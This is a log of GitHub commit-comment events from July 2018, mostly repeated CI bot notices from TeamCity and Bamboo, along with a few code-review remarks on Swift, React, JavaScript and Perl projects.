{"id":"7924888129","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29611355,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-05T18:35:07Z","updated_at":"2018-07-05T18:35:07Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 150](https://teamcity.otenv.com/viewLog.html?buildId=8869673&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-05T18:35:07Z"}
{"id":"7924888190","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29611357,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-05T18:35:08Z","updated_at":"2018-07-05T18:35:08Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 151](https://teamcity.otenv.com/viewLog.html?buildId=8869674&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) is now running\n"}},"created_at":"2018-07-05T18:35:08Z"}
{"id":"7924888223","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29611358,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-05T18:35:09Z","updated_at":"2018-07-05T18:35:09Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 151](https://teamcity.otenv.com/viewLog.html?buildId=8869674&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-05T18:35:09Z"}
{"id":"7924888647","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611368,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-05T18:35:13Z","updated_at":"2018-07-05T18:35:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:35:13Z"}
{"id":"7924890185","type":"CommitCommentEvent","actor":{"login":"legnaleurc"},"repo":{"name":"adsbypasser/adsbypasser"},"payload":{"comment":{"id":29611398,"position":null,"line":null,"path":null,"commit_id":"a00ff4f6bb6b73fbbeda52ada1a95c51faef0056","created_at":"2018-07-05T18:35:34Z","updated_at":"2018-07-05T18:35:34Z","author_association":"MEMBER","body":"Oh, I see, those rules has been merged into another form."}},"created_at":"2018-07-05T18:35:34Z"}
{"id":"7924891119","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611426,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-05T18:35:46Z","updated_at":"2018-07-05T18:35:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:35:46Z"}
{"id":"7924892173","type":"CommitCommentEvent","actor":{"login":"wbaumann"},"repo":{"name":"EvsenevDev/SmartReceiptsiOS"},"payload":{"comment":{"id":29611439,"position":63,"line":63,"path":"SmartReceipts/Services/Auto Backup/BackupProvider.swift","commit_id":"9de7f59fb1aafc7eb7d65783fc6afeec8f401525","created_at":"2018-07-05T18:36:01Z","updated_at":"2018-07-05T18:36:01Z","author_association":"NONE","body":"I probably messed up these definitions on Android. I think `Completable` is more appropriate than `Single<Bool>`, since it simplies that it either completes successfully or not (whereas the `Bool` is always `true`). With that said, it's not a big deal to leave them the same way"}},"created_at":"2018-07-05T18:36:01Z"}
{"id":"7924892548","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611442,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-05T18:36:06Z","updated_at":"2018-07-05T18:36:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:36:06Z"}
{"id":"7924894053","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611451,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-05T18:36:25Z","updated_at":"2018-07-05T18:36:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:36:25Z"}
{"id":"7924894384","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611453,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-05T18:36:29Z","updated_at":"2018-07-05T18:36:29Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-05T18:36:29Z"}
{"id":"7924896527","type":"CommitCommentEvent","actor":{"login":"brantfaircloth"},"repo":{"name":"bioconda/bioconda-recipes"},"payload":{"comment":{"id":29611465,"position":null,"line":null,"path":null,"commit_id":"857414d6998bd1336238fe0e819f7303b1a96a19","created_at":"2018-07-05T18:36:58Z","updated_at":"2018-07-05T18:36:58Z","author_association":"CONTRIBUTOR","body":"Thanks for update.  Will start at 0 next time."}},"created_at":"2018-07-05T18:36:58Z"}
{"id":"7924896630","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611466,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-05T18:37:00Z","updated_at":"2018-07-05T18:37:00Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:37:00Z"}
{"id":"7924896694","type":"CommitCommentEvent","actor":{"login":"wbaumann"},"repo":{"name":"EvsenevDev/SmartReceiptsiOS"},"payload":{"comment":{"id":29611467,"position":15,"line":15,"path":"SmartReceipts/Services/Auto Backup/Providers/NoOpBackupProvider.swift","commit_id":"9de7f59fb1aafc7eb7d65783fc6afeec8f401525","created_at":"2018-07-05T18:37:00Z","updated_at":"2018-07-05T18:37:00Z","author_association":"NONE","body":"Thoughts on returning `nil` here instead?"}},"created_at":"2018-07-05T18:37:00Z"}
{"id":"7924897693","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611474,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-05T18:37:13Z","updated_at":"2018-07-05T18:37:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:37:13Z"}
{"id":"7924898777","type":"CommitCommentEvent","actor":{"login":"marcosgerene"},"repo":{"name":"ZeusAutomacao/DFe.NET"},"payload":{"comment":{"id":29611482,"position":null,"line":null,"path":null,"commit_id":"69a39cc4e8bcadb8cc68d89afa31ce6199dcf708","created_at":"2018-07-05T18:37:28Z","updated_at":"2018-07-05T18:37:28Z","author_association":"COLLABORATOR","body":"Foram feitos 2 PRs identicos, aceitei este pois não havia falhas, mas neste commit não houve alterações reais."}},"created_at":"2018-07-05T18:37:28Z"}
{"id":"7924899229","type":"CommitCommentEvent","actor":{"login":"YousefED"},"repo":{"name":"YonatanKra/cesium"},"payload":{"comment":{"id":29611487,"position":48,"line":237,"path":"Source/DataSources/Entity.js","commit_id":"bdd0cca966104ef464b021f3452a6ce68cbc547f","created_at":"2018-07-05T18:37:34Z","updated_at":"2018-07-05T18:37:34Z","author_association":"NONE","body":"Yes but you never set it with `value` right? Or am I missing something\r\n\r\nNote I didn't test it, just came across the article and noticed this so figured it'd be nice to let you know :)"}},"created_at":"2018-07-05T18:37:34Z"}
{"id":"7924899299","type":"CommitCommentEvent","actor":{"login":"wbaumann"},"repo":{"name":"EvsenevDev/SmartReceiptsiOS"},"payload":{"comment":{"id":29611488,"position":19,"line":19,"path":"SmartReceipts/Services/Auto Backup/Providers/NoOpBackupProvider.swift","commit_id":"9de7f59fb1aafc7eb7d65783fc6afeec8f401525","created_at":"2018-07-05T18:37:35Z","updated_at":"2018-07-05T18:37:35Z","author_association":"NONE","body":"Minor but on Android we set this to `Date(0L)`, so it uses the unix epoch"}},"created_at":"2018-07-05T18:37:35Z"}
{"id":"7924899356","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611490,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-05T18:37:36Z","updated_at":"2018-07-05T18:37:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:37:36Z"}
{"id":"7924899967","type":"CommitCommentEvent","actor":{"login":"Globik"},"repo":{"name":"stan1y/servo"},"payload":{"comment":{"id":29611493,"position":null,"line":null,"path":null,"commit_id":"7562df1ba06b7d613336224af3dd608cf70f788e","created_at":"2018-07-05T18:37:43Z","updated_at":"2018-07-05T18:37:43Z","author_association":"NONE","body":"Excellent, it's nice work."}},"created_at":"2018-07-05T18:37:43Z"}
{"id":"7924900186","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"iamnurs/recipes"},"payload":{"comment":{"id":29611495,"position":91,"line":91,"path":"components/RecipeList.tsx","commit_id":"f4bc8213349f0839f159d449358badde0093ee62","created_at":"2018-07-05T18:37:46Z","updated_at":"2018-07-05T18:37:46Z","author_association":"NONE","body":"Ты передал функцию, которая делает одно дело: вызывает функцию refetch. Лучше сразу передать функцию refetch вот так:\r\n```\r\n{\r\n  refetch: refetch\r\n}\r\n```\r\n\r\nили короче\r\n\r\n```\r\n{\r\n  refetch\r\n}\r\n```"}},"created_at":"2018-07-05T18:37:46Z"}
{"id":"7924901986","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611501,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-05T18:38:11Z","updated_at":"2018-07-05T18:38:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:38:11Z"}
{"id":"7924902374","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29611502,"position":1,"line":null,"path":"1530815894.74/github_test.txt","commit_id":"cabcee4a8c31d5c8d32d0f211d49b93fe8e9ea9b","created_at":"2018-07-05T18:38:16Z","updated_at":"2018-07-05T18:38:16Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-05T18:38:16Z"}
{"id":"7924902675","type":"CommitCommentEvent","actor":{"login":"elektron-bbs"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":29611503,"position":null,"line":null,"path":null,"commit_id":"5b24ee8334d09ec08594b2a238b6138a005e2086","created_at":"2018-07-05T18:38:20Z","updated_at":"2018-07-05T18:38:20Z","author_association":"NONE","body":"Das \"last if\" haben wir auch erst versucht, aber das hatte in unserem Fall keine Auswirkungen, da diese \"Sicherheitsbedingung\" bei nicht validen Signal gar nicht greift. Vielleicht müsste diese Zeile ja wieder einkommentiert werden?\r\n\r\n\t#next if (!$valid);  ## Last chance to try next protocol if there is somethin invalid\r\n\tif ($valid) {\r\n"}},"created_at":"2018-07-05T18:38:20Z"}
{"id":"7924902824","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611504,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-05T18:38:22Z","updated_at":"2018-07-05T18:38:22Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:38:22Z"}
{"id":"7924904522","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611506,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-05T18:38:46Z","updated_at":"2018-07-05T18:38:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:38:46Z"}
{"id":"7924905453","type":"CommitCommentEvent","actor":{"login":"Neverlord"},"repo":{"name":"actor-framework/actor-framework"},"payload":{"comment":{"id":29611508,"position":25,"line":25,"path":"libcaf_core/caf/ip_address.hpp","commit_id":"d5d6c3ecc1bf04e24501771d852c590081fd37bc","created_at":"2018-07-05T18:38:58Z","updated_at":"2018-07-05T18:38:58Z","author_association":"MEMBER","body":"@mavam just for you. 😉"}},"created_at":"2018-07-05T18:38:58Z"}
{"id":"7924905749","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29611512,"position":null,"line":null,"path":null,"commit_id":"fb0b02a0ebe861c943dbea197f279f954f899afa","created_at":"2018-07-05T18:39:03Z","updated_at":"2018-07-05T18:39:03Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#pr-30](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#pr-30).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-30-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-05T18:39:03Z"}
{"id":"7924905973","type":"CommitCommentEvent","actor":{"login":"wbaumann"},"repo":{"name":"EvsenevDev/SmartReceiptsiOS"},"payload":{"comment":{"id":29611513,"position":96,"line":113,"path":"SmartReceipts/Modules/Backup/BackupView.swift","commit_id":"9d30951b3d20e48bf77807325b69f2a714421b9b","created_at":"2018-07-05T18:39:06Z","updated_at":"2018-07-05T18:39:06Z","author_association":"NONE","body":"This will eventually use our localized strings, correct? Just marking to remind"}},"created_at":"2018-07-05T18:39:06Z"}
{"id":"7924907219","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29611518,"position":7,"line":54,"path":"src/index.js","commit_id":"a4cb2dfb71ab15edab75aa0e6688610837f01462","created_at":"2018-07-05T18:39:22Z","updated_at":"2018-07-05T18:39:22Z","author_association":"COLLABORATOR","body":"Adding the extra `e` variable here in unnecessary. In Javascript, you don't have to obey to the function's skeleton.\r\nSo, `handleRemove={() => this.handleRemove(task)}` should work perfectly, and you won't need to allocate any memory for `e`."}},"created_at":"2018-07-05T18:39:22Z"}
{"id":"7924907412","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611519,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-05T18:39:25Z","updated_at":"2018-07-05T18:39:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:39:25Z"}
{"id":"7924907759","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611520,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-05T18:39:29Z","updated_at":"2018-07-05T18:39:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:39:29Z"}
{"id":"7924909207","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611527,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-05T18:39:48Z","updated_at":"2018-07-05T18:39:48Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-05T18:39:48Z"}
{"id":"7924909682","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611528,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-05T18:39:55Z","updated_at":"2018-07-05T18:39:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:39:55Z"}
{"id":"7924911507","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"iamnurs/recipes"},"payload":{"comment":{"id":29611538,"position":70,"line":70,"path":"components/addScreen/AddRecipeScreen.tsx","commit_id":"f4bc8213349f0839f159d449358badde0093ee62","created_at":"2018-07-05T18:40:19Z","updated_at":"2018-07-05T18:40:19Z","author_association":"NONE","body":"Не используй в `setState` `this.state`, используй функцию:\r\n\r\n```\r\nthis.setState(prevState => ({\r\n  ingredients: _.concat(prevState.ingredients, \"\")\r\n}));\r\n```"}},"created_at":"2018-07-05T18:40:19Z"}
{"id":"7924912885","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611544,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-05T18:40:36Z","updated_at":"2018-07-05T18:40:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:40:36Z"}
